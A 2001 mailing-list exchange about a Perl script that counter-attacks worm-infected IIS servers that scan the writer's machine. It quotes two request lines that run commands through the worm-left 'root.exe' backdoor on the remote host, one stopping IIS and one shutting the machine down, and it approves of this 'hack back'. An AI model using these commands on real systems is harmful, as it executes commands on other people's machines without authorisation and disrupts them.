On Friday, September 21, 2001, at 01:24  PM, Chris Devers wrote:

> On Fri, 21 Sep 2001, Ed Silva wrote:
>
>> [snip]
>
> Brilliant. Could you post at least part of the source? I'd be interested
> to see how your script works...
>
I didn't write it, I just found it online, it's GPL'ed and there is a link 
to the source on the page it displays. The source is here:

http://skitzo.septicus.com/default.txt

That will give you the source code.

The meat of what it does is this:

my $iis_stop_req = new HTTP::Request (GET => "http://$ENV{REMOTE_ADDR}/scripts/root.exe?/c+iisreset+/stop");

and

my $server_stop_req = new HTTP::Request (GET => "http://$ENV{REMOTE_ADDR}/scripts/root.exe?/c+rundll32.exe+shell32.dll,SHExitWindowsEx+5");

The first tries to tell IIS to shut down and the second tries to reboot the 
machine or shut it down. Hopefully IIS will stay off and stop scanning 
and attacking.

It doesn't seem to work much of the time, but it's worth a try.

>> Anything like these things are a bit of a tightrope, legally and ethically,
>> but I figure if I'm being attacked the least I can do is try and stop it
>> or otherwise hinder the attacker and keep my own system running smoothly.
>> YMMV... :-/
>
> I figure that as long as you can say you're just "handling incoming
> traffic", you should be okay as long as you don't do anything too
> vigorously destructive to the client on the other end. The LaBrea
> honeypot that made the news yesterday takes this idea a little farther...
>
> But then like everyone else, IANAL.... :)
>
> --
> Chris Devers                     [EMAIL PROTECTED]
>
>
Cheers,

--Ed
